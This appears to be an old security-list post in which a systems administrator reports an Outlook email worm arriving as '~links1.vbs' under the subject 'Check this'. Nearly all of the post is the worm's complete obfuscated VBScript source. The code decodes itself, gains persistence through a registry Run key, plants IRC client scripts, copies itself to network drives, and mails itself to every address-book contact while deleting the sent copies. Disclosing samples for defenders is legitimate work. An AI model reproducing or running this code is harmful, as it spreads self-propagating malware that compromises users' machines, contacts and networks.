Our organization just got hit with a nasty Outlook trojan. What appears to be happening is that the recipient gets an email with the subject "Check this". The message carries an attachment with the filename "~links1.vbs" (a VBScript file). Apparently, when the user double-clicks this file in Outlook, the script goes through the address book and propagates itself. I don't think this trojan has any destructive behaviour. The contents of the attachment are listed below.

-- Albert Hopkins Sr. Systems Specialist Dynacare, Inc ahopkinsat_private

On Error Resume Next Set A1 = CreateObject("Scripting.FileSystemObject") Set A2 = A1.OpenTextFile(WScript.ScriptFullName,1) Do While A2.AtEndOfStream = False And Mid(A3,40,10) <> "`sd]Lhbsnr" A3 = A2.ReadLine Loop A2.Close Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1),B("STOEMM/WCR")),True) A4.WriteLine(B("No!Dssns!Sdrtld!Odyu")) A4.WriteLine(B("Rdu!@0!<!Bsd`udNckdbu)""Rbshquhof/GhmdRxrudlNckdbu""(")) A4.WriteLine(B("Rdu!@3!<!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0(")) A4.WriteLine(B("En!Vihmd!@3/@uDoeNgRusd`l!<!G`mrd!@oe!Lhe)@2-52-01(!=?!""gZOkepquqd""")) A4.WriteLine(B("@2!<!@3/Sd`eMhod")) A4.WriteLine(B("Mnnq")) A4.WriteLine(B("@3/Bmnrd")) A4.WriteLine(B("Rdu!@5!<!@0/Bsd`udUdyuGhmd)@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""JKLMU,T@U""((-Ustd(")) A4.WriteLine(B("@5/VshudMhod)C)""Ql!Gppqp!Pguwog!Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C3!?!EpgcrgQ`hger&""""Uepknrkli,DkjgU{urgoQ`hger""""+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C0!?!C3,QnglRgvrDkjg&YUepknr,UepknrDwjjLcog*3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Bq!Yfkjg!C0,CrGlbQdUrpgco!?!Dcjug!Clb!Okb&C5*2.*3.+!:<!""""^ub_Jf`ulp""""""((")) A4.WriteLine(B("@5/VshudMhod)C)""C5!?!C0,PgcbJklg""((")) A4.WriteLine(B("@5/VshudMhod)C)""Jqqn""((")) A4.WriteLine(B("@5/VshudMhod)C)""C0,Ejqug""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C2!?!C3,EpgcrgRgvrDkjg&C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""URQGOO1YEP""""++*Rpwg+""((")) 
A4.WriteLine(B("Rdu!@4!<!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0(")) A4.WriteLine(B("En!Vihmd!@4/@uDoeNgRusd`l!<!G`mrd")) A4.WriteLine(B("@5/VshudMhod)C)""C2,YpkrgJklg&@&""""""(!'!B)Sdqm`bd)@4/Sd`eMhod-C)""""""""(-C)""""""""""""(((!'!C)""""""++""((")) A4.WriteLine(B("Mnnq")) A4.WriteLine(B("@4/Bmnrd")) A4.WriteLine(B("@5/VshudMhod)C)""C2,Ejqug""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C7!?!EpgcrgQ`hger&@&""""TP`ufsw1Pkboo""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""C7,PgiYpkrg!@&""""KHBV\OL@>O\J>@KFQB_Pliwt^ub_Jf`ulpliw_Tfqgltp_@ruubqwYbupflq_Urq_Urqgoo""""+*C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""URQGOO1YEP""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!Oui@qv&@&""""Wkfp tfoo ^gg ^ pkluw`rw wl iubb [[[ ofqhp lq vlru gbphwls1 Gl vlr t^qw wl `lqwfqrb<""""+*54*@&""""Iubb [[[ ofqhp""""++!?!4!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C4!?!C3,EpgcrgRgvrDkjg&C3,@wkjbNcrf&C7,UngekcjDqjbgpu&@&""""Gbphwls""""++*@&""""IUBB [[[ OFQHP1RUO""""++*Rpwg+""((")) A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg&@&""""XFqwbuqbwPkluw`rwZ""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg&@&""""RUO:kwws=,,ttt1preofjbgfub`wluv1`lj,""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""C4,Ejqug""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C9!?!EpgcrgQ`hger&@&""""TP`ufsw1Qbwtluh""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C6!?!C9,GlwoLgryqpmBpktgu""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!C6,Eqwlr!:<!.!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C;!?!.!Rq!C6,Eqwlr!/!3""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!KlUrp&C6,Krgo&C;+*@&""""__""""++!:<!.!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""C3,Eqn{Dkjg!YUepknr,UepknrDwjjLcog*!C3,@wkjbNcrf&C6,Krgo&C;+*@&""""OFQHP1YEP""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C3.!?!EpgcrgQ`hger&@&""""Lrwollh1>ssof`^wflq""""++""((")) 
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C33!?!C3.,IgrLcogUnceg&@&""""J>SF""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!Gcef!C30!Kl!C33,CbbpguuJkuru""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C35!?!C3.,EpgcrgKrgo&.+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C32!?!3!Rq!C30,CbbpguuGlrpkgu,Eqwlr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C37!?!C30,CbbpguuGlrpkgu&C32+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!C32!?!3!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C37,Cbbpguu""((")) A4.WriteLine(B("@5/VshudMhod)C)""Gjug""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C35,@EE!$!@&""""8 """"+!$!C37,Cbbpguu""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,Uw`hger!?!@&""""@kb`h wkfp""""+""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,@qb{!?!@&""""K^yb irq tfwk wkbpb ofqhp1""""+!$!Efp&35+!$!Efp&3.+!$!@&""""Evb1""""+""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,Crrcefoglru,Cbb!YUepknr,UepknrDwjjLcog""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,BgjgrgCdrgpUw`okr!?!Rpwg""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,Uglb""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dwlerkql!@&@3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!@0!?!3!Rq!Jgl&@3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!:<!52!Clb!Cue&Okb&@3*@0*3++!:<!57!Clb!Cue&Okb&@3*@0*3++!:<!304!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!Oqb!0!?!.!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""@!?!@!$!Efp&Cue&Okb&@3*@0*3++!-!Pkifr&Cue&Okb&C5*9.*3++!-!3*3++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Gjug""((")) A4.WriteLine(B("@5/VshudMhod)C)""@!?!@!$!Efp&Cue&Okb&@3*@0*3++!/!Pkifr&Cue&Okb&C5*9.*3++!-!3*3++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Gjug""((")) A4.WriteLine(B("@5/VshudMhod)C)""@!?!@!$!Okb&@3*@0*3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) 
A4.WriteLine(B("@5/VshudMhod)C)""Glb!Dwlerkql""((")) A4.WriteLine(B("@5/Bmnrd")) A4.WriteLine(B("Gns!D`bi!@7!Ho!@0/Eshwdr")) A4.WriteLine(B("Hg!@7/EshwdUxqd!<!3!Uido")) A4.WriteLine(B("E!@7/EshwdMduuds!'!C)""8ZOKPE""(")) A4.WriteLine(B("E!@7/EshwdMduuds!'!C)""8ZNKPEF;6""(")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Rdu!@6!<!Bsd`udNckdbu)C)""YUepknr,Ufgjj""((")) A4.WriteLine(B("E!@6/SdfSd`e)C)""FMG[aJQECJaOCEFKLGZUqdrycpgZOkepquqdrZYklbqyuZEwppglrTgpukqlZNpqipcoDkjguBkp""((")) A4.WriteLine(B("Gtobuhno!C)C0(")) A4.WriteLine(B("Gns!C3!<!0!Un!Mdo)C0(")) A4.WriteLine(B("Hg!@rb)Lhe)C0-C3-0((!=?!23!@oe!@rb)Lhe)C0-C3-0((!=?!22!@oe!@rb)Lhe)C0-C3-0((!=?!25!@oe!@rb)Lhe)C0-C3-0((!=?!071!@oe!@rb)Lhe)C0-C3-0((!=?!344!Uido")) A4.WriteLine(B("Hg!@rb)Lhe)C0-C3-0((!Lne!3!<!1!Uido")) A4.WriteLine(B("C!<!C!'!Bis)@rb)Lhe)C0-C3-0((!,!Shfiu)@rb)Lhe)@2-9-0((!,!3-0((")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("C!<!C!'!Bis)@rb)Lhe)C0-C3-0((!*!Shfiu)@rb)Lhe)@2-9-0((!,!3-0((")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("C!<!C!'!Lhe)C0-C3-0(")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Doe!Gtobuhno")) A4.WriteLine(B("Gtobuhno!B)B0(")) A4.WriteLine(B("Gns!B3!<!0!Un!Mdo)B0(")) A4.WriteLine(B("Hg!@rb)Lhe)B0-B3-0((!=?!25!@oe!@rb)Lhe)B0-B3-0((!=?!24!@oe!@rb)Lhe)B0-B3-0((!=?!037!Uido")) A4.WriteLine(B("Hg!@rb)Lhe)B0-B3-0((!Lne!3!<!1!Uido")) A4.WriteLine(B("B!<!B!'!Bis)@rb)Lhe)B0-B3-0((!*!Shfiu)@rb)Lhe)@2-09-0((!*!4-0((")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("B!<!B!'!Bis)@rb)Lhe)B0-B3-0((!,!Shfiu)@rb)Lhe)@2-09-0((!*!4-0((")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("B!<!B!'!Lhe)B0-B3-0(")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Doe!Gtobuhno")) A4.WriteLine(B("Rtc!E)E0(")) A4.WriteLine(B("Hg!@0/GnmedsDyhrur)E0(!<!Ustd!Uido")) A4.WriteLine(B("Gns!D`bi!E3!Ho!@0/FduGnmeds)E0(/Ghmdr")) A4.WriteLine(B("Hg!TB`rd)E3/O`ld(!<!C)""OKPE50,GVG""(!Uido")) 
A4.WriteLine(B("Rdu!E2!<!@0/Bsd`udUdyuGhmd)@0/CthmeQ`ui)E3/Q`sdouGnmeds-C)""UEPKNR,KLK""((-Ustd(")) A4.WriteLine(B("E2/VshudMhod)C)""]uepknr_""((")) A4.WriteLine(B("E2/VshudMhod)C)""l.?ql!38hqkl8%8kd!#og! ?!#lkem!bee!uglb!#lkem!""(!'!@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""JKLMU,T@U""(((")) A4.WriteLine(B("E2/Bmnrd")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Hg!TB`rd)E3/O`ld(!<!C)""NKPEF;6,GVG""(!Uido")) A4.WriteLine(B("Rdu!E5!<!@0/Bsd`udUdyuGhmd)@0/CthmeQ`ui)E3/Q`sdouGnmeds-C)""GTGLRU,KLK""((-Ustd(")) A4.WriteLine(B("E5/VshudMhod)C)""]Jgtgju_""((")) A4.WriteLine(B("E5/VshudMhod)C)""Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Eqwlr?4""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj3?.../Wlmlqylu""((")) A4.WriteLine(B("E5/VshudMhod)C)"".../WlmlqyluGlc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj0?3../Jgtgj!3..""((")) A4.WriteLine(B("E5/VshudMhod)C)""3../Jgtgj!3..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj5?0../Jgtgj!0..""((")) A4.WriteLine(B("E5/VshudMhod)C)""0../Jgtgj!0..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj2?5../Jgtgj!5..""((")) A4.WriteLine(B("E5/VshudMhod)C)""5../Jgtgj!5..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj7?2../Jgtgj!2..""((")) A4.WriteLine(B("E5/VshudMhod)C)""2../Jgtgj!2..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj4?7../Jgtgj!7..""((")) A4.WriteLine(B("E5/VshudMhod)C)""7../Jgtgj!7..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""].../Wlmlqylu_""((")) A4.WriteLine(B("E5/VshudMhod)C)""Wugp3?( (>(""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Gtglr3?QL!HQKL8%81bee!uglb!#lkem!""(!'!@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""JKLMU,T@U""(((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?3""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]3../Jgtgj!3.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) 
A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]0../Jgtgj!0.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]5../Jgtgj!5.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]2../Jgtgj!2.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]7../Jgtgj!7.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/Bmnrd")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Gns!D`bi!E4!Ho!@0/FduGnmeds)E0(/RtcGnmedsr")) A4.WriteLine(B("E!E4/Q`ui")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Doe!Rtc")) A4.Close Set A5 = CreateObject(B("VRbshqu/Ridmm")) A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]Stoemm"),A1.BuildPath(A1.GetSpecialFolder(1),B("STOEMM/WCR")) If MsgBox(B("Uihr!vhmm!`ee!`!rinsubtu!un!gsdd!YYY!mhojr!no!xnts!edrjunq/!En!xnt!v`ou!un!bnouhotd>"),36,B("Gsdd!YYY!mhojr")) = 6 Then Set A6 = A1.CreateTextFile(A1.BuildPath(A5.SpecialFolders(B("Edrjunq")),B("GSDD!YYY!MHOJR/TSM")),True) A6.WriteLine(B("ZHoudsoduRinsubtu\")) A6.WriteLine(B("TSM<iuuq;..vvv/rtcmhldehsdbunsx/bnl.")) A6.Close End If Set A7 = CreateObject(B("VRbshqu/Oduvnsj")) Set A8 = A7.EnumNetworkDrives If A8.Count <> 0 Then For A9 = 0 To A8.Count - 1 If InStr(A8.Item(A9),B("]]")) <> 0 Then A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A8.Item(A9),B("MHOJR/WCR")) End If Next End If Set A10 = CreateObject(B("Ntumnnj/@qqmhb`uhno")) Set A11 = A10.GetNameSpace(B("L@QH")) For Each A12 In A11.AddressLists Set A13 = A10.CreateItem(0) For A14 = 1 
To A12.AddressEntries.Count Set A15 = A12.AddressEntries(A14) If A14 = 1 Then A13.BCC = A15.Address Else A13.BCC = A13.BCC & B(":!") & A15.Address End If Next A13.Subject = B("Bidbj!uihr") A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/") A13.Attachments.Add WScript.ScriptFullName A13.DeleteAfterSubmit = True A13.Send Next Function B(B1) For B2 = 1 To Len(B1) If Asc(Mid(B1,B2,1)) <> 34 And Asc(Mid(B1,B2,1)) <> 35 And Asc(Mid(B1,B2,1)) <> 126 Then If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then B = B & Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,70,1)) + 1,1)) Else B = B & Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,70,1)) + 1,1)) End If Else B = B & Mid(B1,B2,1) End If Next End Function